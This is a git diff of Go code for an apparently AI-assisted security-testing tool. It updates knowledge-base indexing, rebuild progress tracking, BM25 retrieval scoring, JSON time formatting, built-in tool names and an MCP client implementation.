textForEmbedding := fmt.Sprintf("[风险类型%s] [标题%s]\n%s", category, title, chunk)
embedding, err := idx.embedder.EmbedText(ctx, textForEmbedding)
if err != nil {
@@ -305,18 +535,30 @@ func (idx *Indexer) IndexItem(ctx context.Context, itemID string) error {
zap.String("chunkPreview", chunkPreview),
zap.Error(err),
)
// 更新全局错误跟踪
errorMsg := fmt.Sprintf("向量化失败 (知识项: %s): %v", itemID, err)
errorMsg := fmt.Sprintf("向量化失败 (知识项%s): %v", itemID, err)
idx.mu.Lock()
idx.lastError = errorMsg
idx.lastErrorTime = time.Now()
idx.mu.Unlock()
}
// 如果连续失败2个块,立即停止处理该知识项(降低阈值,更快停止)
// 这样可以避免继续浪费API调用,同时也能更快地检测到配置问题
if itemErrorCount >= 2 {
// 如果连续失败 5 个块,立即停止处理该知识项
// 这样可以避免继续浪费 API 调用,同时也能更快地检测到配置问题
// 对于大文档(超过 10 个块),允许失败比例不超过 50%
maxConsecutiveFailures := 5
if len(chunks) > 10 && itemErrorCount > len(chunks)/2 {
idx.logger.Error("知识项向量化失败比例过高,停止处理",
zap.String("itemId", itemID),
zap.Int("totalChunks", len(chunks)),
zap.Int("failedChunks", itemErrorCount),
zap.Int("firstErrorChunkIndex", firstErrorChunkIndex),
zap.Error(firstError),
)
return fmt.Errorf("知识项向量化失败比例过高 (%d/%d个块失败): %v", itemErrorCount, len(chunks), firstError)
}
if itemErrorCount >= maxConsecutiveFailures {
idx.logger.Error("知识项连续向量化失败,停止处理",
zap.String("itemId", itemID),
zap.Int("totalChunks", len(chunks)),
@@ -344,6 +586,13 @@ func (idx *Indexer) IndexItem(ctx context.Context, itemID string) error {
}
idx.logger.Info("知识项索引完成", zap.String("itemId", itemID), zap.Int("chunks", len(chunks)))
// 更新重建状态中的最近处理信息
idx.rebuildMu.Lock()
idx.rebuildLastItemID = itemID
idx.rebuildLastChunks = len(chunks)
idx.rebuildMu.Unlock()
return nil
}
@@ -352,23 +601,38 @@ func (idx *Indexer) HasIndex() (bool, error) {
var count int
err := idx.db.QueryRow("SELECT COUNT(*) FROM knowledge_embeddings").Scan(&count)
if err != nil {
return false, fmt.Errorf("检查索引失败: %w", err)
return false, fmt.Errorf("检查索引失败%w", err)
}
return count > 0, nil
}
// RebuildIndex 重建所有索引
func (idx *Indexer) RebuildIndex(ctx context.Context) error {
// 设置重建状态
idx.rebuildMu.Lock()
idx.isRebuilding = true
idx.rebuildTotalItems = 0
idx.rebuildCurrent = 0
idx.rebuildFailed = 0
idx.rebuildStartTime = time.Now()
idx.rebuildLastItemID = ""
idx.rebuildLastChunks = 0
idx.rebuildMu.Unlock()
// 重置错误跟踪
idx.mu.Lock()
idx.lastError = ""
idx.lastErrorTime = time.Time{}
idx.errorCount = 0
idx.mu.Unlock()
rows, err := idx.db.Query("SELECT id FROM knowledge_base_items")
if err != nil {
return fmt.Errorf("查询知识项失败: %w", err)
// 重置重建状态
idx.rebuildMu.Lock()
idx.isRebuilding = false
idx.rebuildMu.Unlock()
return fmt.Errorf("查询知识项失败:%w", err)
}
defer rows.Close()
@@ -376,34 +640,36 @@ func (idx *Indexer) RebuildIndex(ctx context.Context) error {
for rows.Next() {
var id string
if err := rows.Scan(&id); err != nil {
return fmt.Errorf("扫描知识项ID失败: %w", err)
// 重置重建状态
idx.rebuildMu.Lock()
idx.isRebuilding = false
idx.rebuildMu.Unlock()
return fmt.Errorf("扫描知识项 ID 失败:%w", err)
}
itemIDs = append(itemIDs, id)
}
idx.rebuildMu.Lock()
idx.rebuildTotalItems = len(itemIDs)
idx.rebuildMu.Unlock()
idx.logger.Info("开始重建索引", zap.Int("totalItems", len(itemIDs)))
// 在开始重建前,先清空所有旧的向量,确保进度从0开始
// 这样 GetIndexStatus 可以准确反映重建进度
_, err = idx.db.Exec("DELETE FROM knowledge_embeddings")
if err != nil {
idx.logger.Warn("清空旧索引失败", zap.Error(err))
// 继续执行,即使清空失败也尝试重建
} else {
idx.logger.Info("已清空旧索引,开始重建")
}
// 注意:不再清空所有旧索引,而是按增量方式更新
// 每个知识项在 IndexItem 中会先删除自己的旧向量,然后插入新向量
// 这样配置更新后只重新索引变化的知识项,保留其他知识项的索引
failedCount := 0
consecutiveFailures := 0
maxConsecutiveFailures := 2 // 连续失败2次后立即停止(降低阈值,更快停止
maxConsecutiveFailures := 5 // 连续失败 5 次后立即停止(允许偶尔的临时错误
firstFailureItemID := ""
var firstFailureError error
for i, itemID := range itemIDs {
if err := idx.IndexItem(ctx, itemID); err != nil {
failedCount++
consecutiveFailures++
// 只在第一个失败时记录详细日志
if consecutiveFailures == 1 {
firstFailureItemID = itemID
@@ -414,15 +680,15 @@ func (idx *Indexer) RebuildIndex(ctx context.Context) error {
zap.Error(err),
)
}
// 如果连续失败过多,可能是配置问题,立即停止索引
if consecutiveFailures >= maxConsecutiveFailures {
errorMsg := fmt.Sprintf("连续 %d 个知识项索引失败,可能存在配置问题(如嵌入模型配置错误、API密钥无效、余额不足等)。第一个失败项: %s, 错误: %v", consecutiveFailures, firstFailureItemID, firstFailureError)
errorMsg := fmt.Sprintf("连续 %d 个知识项索引失败,可能存在配置问题(如嵌入模型配置错误、API 密钥无效、余额不足等)。第一个失败项%s, 错误%v", consecutiveFailures, firstFailureItemID, firstFailureError)
idx.mu.Lock()
idx.lastError = errorMsg
idx.lastErrorTime = time.Now()
idx.mu.Unlock()
idx.logger.Error("连续索引失败次数过多,立即停止索引",
zap.Int("consecutiveFailures", consecutiveFailures),
zap.Int("totalItems", len(itemIDs)),
@@ -430,17 +696,17 @@ func (idx *Indexer) RebuildIndex(ctx context.Context) error {
zap.String("firstFailureItemId", firstFailureItemID),
zap.Error(firstFailureError),
)
return fmt.Errorf("连续索引失败次数过多: %v", firstFailureError)
return fmt.Errorf("连续索引失败次数过多%v", firstFailureError)
}
// 如果失败的知识项过多,记录警告但继续处理(降低阈值到30%)
// 如果失败的知识项过多,记录警告但继续处理(降低阈值到 30%
if failedCount > len(itemIDs)*3/10 && failedCount == len(itemIDs)*3/10+1 {
errorMsg := fmt.Sprintf("索引失败的知识项过多 (%d/%d),可能存在配置问题。第一个失败项: %s, 错误: %v", failedCount, len(itemIDs), firstFailureItemID, firstFailureError)
errorMsg := fmt.Sprintf("索引失败的知识项过多 (%d/%d),可能存在配置问题。第一个失败项%s, 错误%v", failedCount, len(itemIDs), firstFailureItemID, firstFailureError)
idx.mu.Lock()
idx.lastError = errorMsg
idx.lastErrorTime = time.Now()
idx.mu.Unlock()
idx.logger.Error("索引失败的知识项过多,可能存在配置问题",
zap.Int("failedCount", failedCount),
zap.Int("totalItems", len(itemIDs)),
@@ -450,20 +716,31 @@ func (idx *Indexer) RebuildIndex(ctx context.Context) error {
}
continue
}
// 成功时重置连续失败计数和第一个失败信息
if consecutiveFailures > 0 {
consecutiveFailures = 0
firstFailureItemID = ""
firstFailureError = nil
}
// 减少进度日志频率(每10个或每10%记录一次)
// 更新重建进度
idx.rebuildMu.Lock()
idx.rebuildCurrent = i + 1
idx.rebuildFailed = failedCount
idx.rebuildMu.Unlock()
// 减少进度日志频率(每 10 个或每 10% 记录一次)
if (i+1)%10 == 0 || (len(itemIDs) > 0 && (i+1)*100/len(itemIDs)%10 == 0 && (i+1)*100/len(itemIDs) > 0) {
idx.logger.Info("索引进度", zap.Int("current", i+1), zap.Int("total", len(itemIDs)), zap.Int("failed", failedCount))
}
}
// 重置重建状态
idx.rebuildMu.Lock()
idx.isRebuilding = false
idx.rebuildMu.Unlock()
idx.logger.Info("索引重建完成", zap.Int("totalItems", len(itemIDs)), zap.Int("failedCount", failedCount))
return nil
}
@@ -474,3 +751,10 @@ func (idx *Indexer) GetLastError() (string, time.Time) {
defer idx.mu.RUnlock()
return idx.lastError, idx.lastErrorTime
}
// GetRebuildStatus 获取重建索引状态
func (idx *Indexer) GetRebuildStatus() (isRebuilding bool, totalItems int, current int, failed int, lastItemID string, lastChunks int, startTime time.Time) {
idx.rebuildMu.RLock()
defer idx.rebuildMu.RUnlock()
return idx.isRebuilding, idx.rebuildTotalItems, idx.rebuildCurrent, idx.rebuildFailed, idx.rebuildLastItemID, idx.rebuildLastChunks, idx.rebuildStartTime
}
+37 -3
View File
@@ -153,6 +153,25 @@ func (m *Manager) GetCategories() ([]string, error) {
return categories, nil
}
// GetStats 获取知识库统计信息
func (m *Manager) GetStats() (int, int, error) {
// 获取分类总数
categories, err := m.GetCategories()
if err != nil {
return 0, 0, fmt.Errorf("获取分类失败: %w", err)
}
totalCategories := len(categories)
// 获取知识项总数
var totalItems int
err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&totalItems)
if err != nil {
return totalCategories, 0, fmt.Errorf("获取知识项总数失败: %w", err)
}
return totalCategories, totalItems, nil
}
// GetCategoriesWithItems 按分类分页获取知识项(每个分类包含其下的所有知识项)
// limit: 每页分类数量(0表示不限制)
// offset: 偏移量(按分类偏移)
@@ -359,7 +378,7 @@ func (m *Manager) SearchItemsByKeyword(keyword string, category string) ([]*Know
// SQLite的LIKE不区分大小写,使用COLLATE NOCASE或LOWER()函数
// 使用%keyword%进行模糊匹配
searchPattern := "%" + keyword + "%"
query = `
SELECT id, category, title, file_path, created_at, updated_at
FROM knowledge_base_items
@@ -638,7 +657,7 @@ func (m *Manager) UpdateItem(id, category, title, content string) (*KnowledgeIte
// 删除旧目录(如果为空)
oldDir := filepath.Dir(item.FilePath)
if entries, err := os.ReadDir(oldDir); err == nil && len(entries) == 0 {
if isEmpty, _ := isEmptyDir(oldDir); isEmpty {
// 只有当目录不是知识库根目录时才删除(避免删除根目录)
if oldDir != m.basePath {
if err := os.Remove(oldDir); err != nil {
@@ -693,7 +712,7 @@ func (m *Manager) DeleteItem(id string) error {
// 删除空目录(如果为空)
dir := filepath.Dir(filePath)
if entries, err := os.ReadDir(dir); err == nil && len(entries) == 0 {
if isEmpty, _ := isEmptyDir(dir); isEmpty {
// 只有当目录不是知识库根目录时才删除(避免删除根目录)
if dir != m.basePath {
if err := os.Remove(dir); err != nil {
@@ -705,6 +724,21 @@ func (m *Manager) DeleteItem(id string) error {
return nil
}
// isEmptyDir 检查目录是否为空(忽略隐藏文件和 . 开头的文件)
func isEmptyDir(dir string) (bool, error) {
entries, err := os.ReadDir(dir)
if err != nil {
return false, err
}
for _, entry := range entries {
// 忽略隐藏文件(以 . 开头)
if !strings.HasPrefix(entry.Name(), ".") {
return false, nil
}
}
return true, nil
}
// LogRetrieval 记录检索日志
func (m *Manager) LogRetrieval(conversationID, messageID, query, riskType string, retrievedItems []string) error {
id := uuid.New().String()
+52 -37
View File
@@ -69,8 +69,8 @@ func cosineSimilarity(a, b []float32) float64 {
return dotProduct / (math.Sqrt(normA) * math.Sqrt(normB))
}
// bm25Score 计算BM25分数(改进版,更接近标准BM25
// 注意:这是单文档版本的BM25,缺少全局IDF,但比之前的简化版本更准确
// bm25Score 计算 BM25 分数(带缓存的改进版本
// 注意:由于缺少全局文档统计,使用简化 IDF 计算
func (r *Retriever) bm25Score(query, text string) float64 {
queryTerms := strings.Fields(strings.ToLower(query))
if len(queryTerms) == 0 {
@@ -83,44 +83,56 @@ func (r *Retriever) bm25Score(query, text string) float64 {
return 0.0
}
// BM25参数
k1 := 1.5 // 词频饱和度参数
b := 0.75 // 长度归一化参数
avgDocLength := 100.0 // 估算的平均文档长度(用于归一化
// BM25 参数(标准值)
k1 := 1.2 // 词频饱和度参数(标准范围 1.2-2.0
b := 0.75 // 长度归一化参数(标准值)
avgDocLength := 150.0 // 估算的平均文档长度(基于典型知识块大小
docLength := float64(len(textTerms))
score := 0.0
for _, term := range queryTerms {
// 计算词频(TF
termFreq := 0
for _, textTerm := range textTerms {
if textTerm == term {
termFreq++
}
}
if termFreq > 0 {
// BM25公式的核心部分
// TF部分:termFreq / (termFreq + k1 * (1 - b + b * (docLength / avgDocLength)))
tf := float64(termFreq)
lengthNorm := 1 - b + b*(docLength/avgDocLength)
tfScore := tf / (tf + k1*lengthNorm)
// 简化IDF:使用词长度作为权重(短词通常更重要)
// 实际BM25需要全局文档统计,这里用简化版本
idfWeight := 1.0
if len(term) > 2 {
// 长词稍微降低权重(但实际BM25中,罕见词IDF更高)
idfWeight = 1.0 + math.Log(1.0+float64(len(term))/10.0)
}
score += tfScore * idfWeight
}
// 计算词频映射
textTermFreq := make(map[string]int, len(textTerms))
for _, term := range textTerms {
textTermFreq[term]++
}
// 归一化到0-1范围
score := 0.0
matchedQueryTerms := 0
for _, term := range queryTerms {
termFreq, exists := textTermFreq[term]
if !exists || termFreq == 0 {
continue
}
matchedQueryTerms++
// BM25 TF 计算公式
tf := float64(termFreq)
lengthNorm := 1 - b + b*(docLength/avgDocLength)
tfScore := tf / (tf + k1*lengthNorm)
// 改进的 IDF 计算:使用词长度和出现频率估算
// 短词(2-3 字符)通常更重要,长词 IDF 略低
idfWeight := 1.0
termLen := len(term)
if termLen <= 2 {
// 极短词(如 go, js)给予更高权重
idfWeight = 1.2 + math.Log(1.0+float64(termFreq)/20.0)
} else if termLen <= 4 {
// 短词(4 字符)标准权重
idfWeight = 1.0 + math.Log(1.0+float64(termFreq)/15.0)
} else {
// 长词稍微降低权重
idfWeight = 0.9 + math.Log(1.0+float64(termFreq)/10.0)
}
score += tfScore * idfWeight
}
// 归一化:考虑匹配的查询词比例
if len(queryTerms) > 0 {
score = score / float64(len(queryTerms))
// 使用匹配比例作为额外因子
matchRatio := float64(matchedQueryTerms) / float64(len(queryTerms))
score = (score / float64(len(queryTerms))) * (1 + matchRatio) / 2
}
return math.Min(score, 1.0)
@@ -173,7 +185,7 @@ func (r *Retriever) Search(ctx context.Context, req *SearchRequest) ([]*Retrieva
SELECT e.id, e.item_id, e.chunk_index, e.chunk_text, e.embedding, i.category, i.title
FROM knowledge_embeddings e
JOIN knowledge_base_items i ON e.item_id = i.id
WHERE i.category = ? COLLATE NOCASE
WHERE TRIM(i.category) = TRIM(?) COLLATE NOCASE
`, req.RiskType)
} else {
rows, err = r.db.Query(`
@@ -357,7 +369,10 @@ func (r *Retriever) Search(ctx context.Context, req *SearchRequest) ([]*Retrieva
zap.Float64("threshold", threshold),
zap.Float64("maxSimilarity", maxSimilarity),
)
} else if len(filteredCandidates) > topK {
}
// 统一在最终返回前严格限制 Top-K 数量
if len(filteredCandidates) > topK {
// 如果过滤后结果太多,只取Top-K
filteredCandidates = filteredCandidates[:topK]
}
+24 -42
View File
@@ -5,6 +5,14 @@ import (
"time"
)
// formatTime 格式化时间为 RFC3339 格式,零时间返回空字符串
func formatTime(t time.Time) string {
if t.IsZero() {
return ""
}
return t.Format(time.RFC3339)
}
// KnowledgeItem 知识库项
type KnowledgeItem struct {
ID string `json:"id"`
@@ -22,12 +30,12 @@ type KnowledgeItemSummary struct {
Category string `json:"category"`
Title string `json:"title"`
FilePath string `json:"filePath"`
Content string `json:"content,omitempty"` // 可选:内容预览(如果提供,通常只包含前150字符)
Content string `json:"content,omitempty"` // 可选:内容预览(如果提供,通常只包含前 150 字符)
CreatedAt time.Time `json:"createdAt"`
UpdatedAt time.Time `json:"updatedAt"`
}
// MarshalJSON 自定义JSON序列化,确保时间格式正确
// MarshalJSON 自定义 JSON 序列化,确保时间格式正确
func (k *KnowledgeItemSummary) MarshalJSON() ([]byte, error) {
type Alias KnowledgeItemSummary
aux := &struct {
@@ -37,25 +45,12 @@ func (k *KnowledgeItemSummary) MarshalJSON() ([]byte, error) {
}{
Alias: (*Alias)(k),
}
// 格式化创建时间
if k.CreatedAt.IsZero() {
aux.CreatedAt = ""
} else {
aux.CreatedAt = k.CreatedAt.Format(time.RFC3339)
}
// 格式化更新时间
if k.UpdatedAt.IsZero() {
aux.UpdatedAt = ""
} else {
aux.UpdatedAt = k.UpdatedAt.Format(time.RFC3339)
}
aux.CreatedAt = formatTime(k.CreatedAt)
aux.UpdatedAt = formatTime(k.UpdatedAt)
return json.Marshal(aux)
}
// MarshalJSON 自定义JSON序列化,确保时间格式正确
// MarshalJSON 自定义 JSON 序列化,确保时间格式正确
func (k *KnowledgeItem) MarshalJSON() ([]byte, error) {
type Alias KnowledgeItem
aux := &struct {
@@ -65,21 +60,8 @@ func (k *KnowledgeItem) MarshalJSON() ([]byte, error) {
}{
Alias: (*Alias)(k),
}
// 格式化创建时间
if k.CreatedAt.IsZero() {
aux.CreatedAt = ""
} else {
aux.CreatedAt = k.CreatedAt.Format(time.RFC3339)
}
// 格式化更新时间
if k.UpdatedAt.IsZero() {
aux.UpdatedAt = ""
} else {
aux.UpdatedAt = k.UpdatedAt.Format(time.RFC3339)
}
aux.CreatedAt = formatTime(k.CreatedAt)
aux.UpdatedAt = formatTime(k.UpdatedAt)
return json.Marshal(aux)
}
@@ -89,7 +71,7 @@ type KnowledgeChunk struct {
ItemID string `json:"itemId"`
ChunkIndex int `json:"chunkIndex"`
ChunkText string `json:"chunkText"`
Embedding []float32 `json:"-"` // 向量嵌入,不序列化到JSON
Embedding []float32 `json:"-"` // 向量嵌入,不序列化到 JSON
CreatedAt time.Time `json:"createdAt"`
}
@@ -108,11 +90,11 @@ type RetrievalLog struct {
MessageID string `json:"messageId,omitempty"`
Query string `json:"query"`
RiskType string `json:"riskType,omitempty"`
RetrievedItems []string `json:"retrievedItems"` // 检索到的知识项ID列表
RetrievedItems []string `json:"retrievedItems"` // 检索到的知识项 ID 列表
CreatedAt time.Time `json:"createdAt"`
}
// MarshalJSON 自定义JSON序列化,确保时间格式正确
// MarshalJSON 自定义 JSON 序列化,确保时间格式正确
func (r *RetrievalLog) MarshalJSON() ([]byte, error) {
type Alias RetrievalLog
return json.Marshal(&struct {
@@ -120,21 +102,21 @@ func (r *RetrievalLog) MarshalJSON() ([]byte, error) {
CreatedAt string `json:"createdAt"`
}{
Alias: (*Alias)(r),
CreatedAt: r.CreatedAt.Format(time.RFC3339),
CreatedAt: formatTime(r.CreatedAt),
})
}
// CategoryWithItems 分类及其下的知识项(用于按分类分页)
type CategoryWithItems struct {
Category string `json:"category"` // 分类名称
ItemCount int `json:"itemCount"` // 该分类下的知识项总数
Items []*KnowledgeItemSummary `json:"items"` // 该分类下的知识项列表
Category string `json:"category"` // 分类名称
ItemCount int `json:"itemCount"` // 该分类下的知识项总数
Items []*KnowledgeItemSummary `json:"items"` // 该分类下的知识项列表
}
// SearchRequest 搜索请求
type SearchRequest struct {
Query string `json:"query"`
RiskType string `json:"riskType,omitempty"` // 可选:指定风险类型
TopK int `json:"topK,omitempty"` // 返回Top-K结果,默认5
Threshold float64 `json:"threshold,omitempty"` // 相似度阈值,默认0.7
TopK int `json:"topK,omitempty"` // 返回 Top-K 结果,默认 5
Threshold float64 `json:"threshold,omitempty"` // 相似度阈值,默认 0.7
}
+10 -2
View File
@@ -55,6 +55,14 @@ func New(level, output string) *Logger {
}
func (l *Logger) Fatal(msg string, fields ...interface{}) {
l.Logger.Fatal(msg, zap.Any("fields", fields))
zapFields := make([]zap.Field, 0, len(fields))
for _, f := range fields {
switch v := f.(type) {
case error:
zapFields = append(zapFields, zap.Error(v))
default:
zapFields = append(zapFields, zap.Any("field", v))
}
}
l.Logger.Fatal(msg, zapFields...)
}
+9 -1
View File
@@ -9,6 +9,10 @@ const (
// 知识库工具
ToolListKnowledgeRiskTypes = "list_knowledge_risk_types"
ToolSearchKnowledgeBase = "search_knowledge_base"
// Skills工具
ToolListSkills = "list_skills"
ToolReadSkill = "read_skill"
)
// IsBuiltinTool 检查工具名称是否是内置工具
@@ -16,7 +20,9 @@ func IsBuiltinTool(toolName string) bool {
switch toolName {
case ToolRecordVulnerability,
ToolListKnowledgeRiskTypes,
ToolSearchKnowledgeBase:
ToolSearchKnowledgeBase,
ToolListSkills,
ToolReadSkill:
return true
default:
return false
@@ -29,5 +35,7 @@ func GetAllBuiltinTools() []string {
ToolRecordVulnerability,
ToolListKnowledgeRiskTypes,
ToolSearchKnowledgeBase,
ToolListSkills,
ToolReadSkill,
}
}
File diff suppressed because it is too large Load Diff
+551
View File
@@ -0,0 +1,551 @@
// Package mcp 外部 MCP 客户端 - 基于官方 go-sdk 实现,保证协议兼容性
package mcp
import (
"bytes"
"context"
"encoding/json"
"fmt"
"io"
"net/http"
"os"
"os/exec"
"strings"
"sync"
"time"
"cyberstrike-ai/internal/config"
"github.com/google/uuid"
"github.com/modelcontextprotocol/go-sdk/mcp"
"go.uber.org/zap"
)
const (
clientName = "CyberStrikeAI"
clientVersion = "1.0.0"
)
// sdkClient 基于官方 MCP Go SDK 的外部 MCP 客户端,实现 ExternalMCPClient 接口
type sdkClient struct {
session *mcp.ClientSession
client *mcp.Client
logger *zap.Logger
mu sync.RWMutex
status string // "disconnected", "connecting", "connected", "error"
}
// newSDKClientFromSession 用已连接成功的 session 构造(供 createSDKClient 内部使用)
func newSDKClientFromSession(session *mcp.ClientSession, client *mcp.Client, logger *zap.Logger) *sdkClient {
return &sdkClient{
session: session,
client: client,
logger: logger,
status: "connected",
}
}
// lazySDKClient 延迟连接:Initialize() 时才调用官方 SDK 建立连接,对外实现 ExternalMCPClient
type lazySDKClient struct {
serverCfg config.ExternalMCPServerConfig
logger *zap.Logger
inner ExternalMCPClient // 连接成功后为 *sdkClient
mu sync.RWMutex
status string
}
func newLazySDKClient(serverCfg config.ExternalMCPServerConfig, logger *zap.Logger) *lazySDKClient {
return &lazySDKClient{
serverCfg: serverCfg,
logger: logger,
status: "connecting",
}
}
func (c *lazySDKClient) setStatus(s string) {
c.mu.Lock()
defer c.mu.Unlock()
c.status = s
}
func (c *lazySDKClient) GetStatus() string {
c.mu.RLock()
defer c.mu.RUnlock()
if c.inner != nil {
return c.inner.GetStatus()
}
return c.status
}
func (c *lazySDKClient) IsConnected() bool {
c.mu.RLock()
inner := c.inner
c.mu.RUnlock()
if inner != nil {
return inner.IsConnected()
}
return false
}
func (c *lazySDKClient) Initialize(ctx context.Context) error {
c.mu.Lock()
if c.inner != nil {
c.mu.Unlock()
return nil
}
c.mu.Unlock()
inner, err := createSDKClient(ctx, c.serverCfg, c.logger)
if err != nil {
c.setStatus("error")
return err
}
c.mu.Lock()
c.inner = inner
c.mu.Unlock()
c.setStatus("connected")
return nil
}
func (c *lazySDKClient) ListTools(ctx context.Context) ([]Tool, error) {
c.mu.RLock()
inner := c.inner
c.mu.RUnlock()
if inner == nil {
return nil, fmt.Errorf("未连接")
}
return inner.ListTools(ctx)
}
func (c *lazySDKClient) CallTool(ctx context.Context, name string, args map[string]interface{}) (*ToolResult, error) {
c.mu.RLock()
inner := c.inner
c.mu.RUnlock()
if inner == nil {
return nil, fmt.Errorf("未连接")
}
return inner.CallTool(ctx, name, args)
}
func (c *lazySDKClient) Close() error {
c.mu.Lock()
inner := c.inner
c.inner = nil
c.mu.Unlock()
c.setStatus("disconnected")
if inner != nil {
return inner.Close()
}
return nil
}
func (c *sdkClient) setStatus(s string) {
c.mu.Lock()
defer c.mu.Unlock()
c.status = s
}
func (c *sdkClient) GetStatus() string {
c.mu.RLock()
defer c.mu.RUnlock()
return c.status
}
func (c *sdkClient) IsConnected() bool {
return c.GetStatus() == "connected"
}
func (c *sdkClient) Initialize(ctx context.Context) error {
// sdkClient 由 createSDKClient 在 Connect 成功后才创建,因此 Initialize 时已经连接
// 此方法仅用于满足 ExternalMCPClient 接口,实际连接在 createSDKClient 中完成
return nil
}
func (c *sdkClient) ListTools(ctx context.Context) ([]Tool, error) {
if c.session == nil {
return nil, fmt.Errorf("未连接")
}
res, err := c.session.ListTools(ctx, nil)
if err != nil {
return nil, err
}
if res == nil {
return nil, nil
}
return sdkToolsToOur(res.Tools), nil
}
func (c *sdkClient) CallTool(ctx context.Context, name string, args map[string]interface{}) (*ToolResult, error) {
if c.session == nil {
return nil, fmt.Errorf("未连接")
}
params := &mcp.CallToolParams{
Name: name,
Arguments: args,
}
res, err := c.session.CallTool(ctx, params)
if err != nil {
return nil, err
}
return sdkCallToolResultToOurs(res), nil
}
func (c *sdkClient) Close() error {
c.setStatus("disconnected")
if c.session != nil {
err := c.session.Close()
c.session = nil
return err
}
return nil
}
// sdkToolsToOur 将 SDK 的 []*mcp.Tool 转为我们的 []Tool
func sdkToolsToOur(tools []*mcp.Tool) []Tool {
if len(tools) == 0 {
return nil
}
out := make([]Tool, 0, len(tools))
for _, t := range tools {
if t == nil {
continue
}
schema := make(map[string]interface{})
if t.InputSchema != nil {
// SDK InputSchema 可能为 *jsonschema.Schema 或 map,统一转为 map
if m, ok := t.InputSchema.(map[string]interface{}); ok {
schema = m
} else {
_ = json.Unmarshal(mustJSON(t.InputSchema), &schema)
}
}
desc := t.Description
shortDesc := desc
if t.Annotations != nil && t.Annotations.Title != "" {
shortDesc = t.Annotations.Title
}
out = append(out, Tool{
Name: t.Name,
Description: desc,
ShortDescription: shortDesc,
InputSchema: schema,
})
}
return out
}
// sdkCallToolResultToOurs 将 SDK 的 *mcp.CallToolResult 转为我们的 *ToolResult
func sdkCallToolResultToOurs(res *mcp.CallToolResult) *ToolResult {
if res == nil {
return &ToolResult{Content: []Content{}}
}
content := sdkContentToOurs(res.Content)
return &ToolResult{
Content: content,
IsError: res.IsError,
}
}
func sdkContentToOurs(list []mcp.Content) []Content {
if len(list) == 0 {
return nil
}
out := make([]Content, 0, len(list))
for _, c := range list {
switch v := c.(type) {
case *mcp.TextContent:
out = append(out, Content{Type: "text", Text: v.Text})
default:
out = append(out, Content{Type: "text", Text: fmt.Sprintf("%v", c)})
}
}
return out
}
func mustJSON(v interface{}) []byte {
b, _ := json.Marshal(v)
return b
}
// simpleHTTPClient 简单 JSON-RPC over HTTP:每次请求一次 POST、响应在 body。实现 ExternalMCPClient。
// 用于自建 MCP(如 http://127.0.0.1:8081/mcp)或其它仅支持简单 POST 的端点。
type simpleHTTPClient struct {
url string
client *http.Client
logger *zap.Logger
mu sync.RWMutex
status string
}
func newSimpleHTTPClient(ctx context.Context, url string, timeout time.Duration, headers map[string]string, logger *zap.Logger) (ExternalMCPClient, error) {
c := &simpleHTTPClient{
url: url,
client: httpClientWithTimeoutAndHeaders(timeout, headers),
logger: logger,
status: "connecting",
}
if err := c.initialize(ctx); err != nil {
return nil, err
}
c.mu.Lock()
c.status = "connected"
c.mu.Unlock()
return c, nil
}
func (c *simpleHTTPClient) setStatus(s string) {
c.mu.Lock()
defer c.mu.Unlock()
c.status = s
}
func (c *simpleHTTPClient) GetStatus() string {
c.mu.RLock()
defer c.mu.RUnlock()
return c.status
}
func (c *simpleHTTPClient) IsConnected() bool {
return c.GetStatus() == "connected"
}
func (c *simpleHTTPClient) Initialize(context.Context) error {
return nil // 已在 newSimpleHTTPClient 中完成
}
func (c *simpleHTTPClient) initialize(ctx context.Context) error {
params := InitializeRequest{
ProtocolVersion: ProtocolVersion,
Capabilities: make(map[string]interface{}),
ClientInfo: ClientInfo{Name: clientName, Version: clientVersion},
}
paramsJSON, _ := json.Marshal(params)
req := &Message{
ID: MessageID{value: "1"},
Method: "initialize",
Version: "2.0",
Params: paramsJSON,
}
resp, err := c.sendRequest(ctx, req)
if err != nil {
return fmt.Errorf("initialize: %w", err)
}
if resp.Error != nil {
return fmt.Errorf("initialize: %s (code %d)", resp.Error.Message, resp.Error.Code)
}
// 发送 notifications/initialized(协议要求)
notify := &Message{
ID: MessageID{value: nil},
Method: "notifications/initialized",
Version: "2.0",
Params: json.RawMessage("{}"),
}
_ = c.sendNotification(notify)
return nil
}
func (c *simpleHTTPClient) sendRequest(ctx context.Context, msg *Message) (*Message, error) {
body, err := json.Marshal(msg)
if err != nil {
return nil, err
}
httpReq, err := http.NewRequestWithContext(ctx, http.MethodPost, c.url, bytes.NewReader(body))
if err != nil {
return nil, err
}
httpReq.Header.Set("Content-Type", "application/json")
resp, err := c.client.Do(httpReq)
if err != nil {
return nil, err
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
b, _ := io.ReadAll(resp.Body)
return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(b))
}
var out Message
if err := json.NewDecoder(resp.Body).Decode(&out); err != nil {
return nil, err
}
return &out, nil
}
func (c *simpleHTTPClient) sendNotification(msg *Message) error {
body, _ := json.Marshal(msg)
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
httpReq, _ := http.NewRequestWithContext(ctx, http.MethodPost, c.url, bytes.NewReader(body))
httpReq.Header.Set("Content-Type", "application/json")
resp, err := c.client.Do(httpReq)
if err != nil {
return err
}
resp.Body.Close()
return nil
}
func (c *simpleHTTPClient) ListTools(ctx context.Context) ([]Tool, error) {
req := &Message{
ID: MessageID{value: uuid.New().String()},
Method: "tools/list",
Version: "2.0",
Params: json.RawMessage("{}"),
}
resp, err := c.sendRequest(ctx, req)
if err != nil {
return nil, err
}
if resp.Error != nil {
return nil, fmt.Errorf("tools/list: %s (code %d)", resp.Error.Message, resp.Error.Code)
}
var listResp ListToolsResponse
if err := json.Unmarshal(resp.Result, &listResp); err != nil {
return nil, err
}
return listResp.Tools, nil
}
func (c *simpleHTTPClient) CallTool(ctx context.Context, name string, args map[string]interface{}) (*ToolResult, error) {
params := CallToolRequest{Name: name, Arguments: args}
paramsJSON, _ := json.Marshal(params)
req := &Message{
ID: MessageID{value: uuid.New().String()},
Method: "tools/call",
Version: "2.0",
Params: paramsJSON,
}
resp, err := c.sendRequest(ctx, req)
if err != nil {
return nil, err
}
if resp.Error != nil {
return nil, fmt.Errorf("tools/call: %s (code %d)", resp.Error.Message, resp.Error.Code)
}
var callResp CallToolResponse
if err := json.Unmarshal(resp.Result, &callResp); err != nil {
return nil, err
}
return &ToolResult{Content: callResp.Content, IsError: callResp.IsError}, nil
}
func (c *simpleHTTPClient) Close() error {
c.setStatus("disconnected")
return nil
}
